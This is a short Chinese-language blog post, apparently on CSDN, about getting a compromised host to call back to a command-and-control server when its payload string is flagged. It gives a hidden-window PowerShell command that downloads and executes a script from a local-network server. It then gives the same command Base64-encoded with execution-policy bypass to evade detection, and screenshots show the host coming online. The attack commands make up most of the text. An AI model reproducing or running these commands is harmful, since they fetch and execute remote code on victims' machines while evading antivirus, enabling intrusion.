0x01前言
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线
0x02问题
1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=
![在这里插入图片描述](https://img-blog.csdnimg.cn/88db624482bb4e4aa8aa96dac374ecd8.png)
2、原句子
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"
3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
![在这里插入图片描述](https://img-blog.csdnimg.cn/76df390148bc4565877e139082ac98e5.png)
主机上线
![在这里插入图片描述](https://img-blog.csdnimg.cn/a4f2035c372d4a7db3beed7736543e87.png)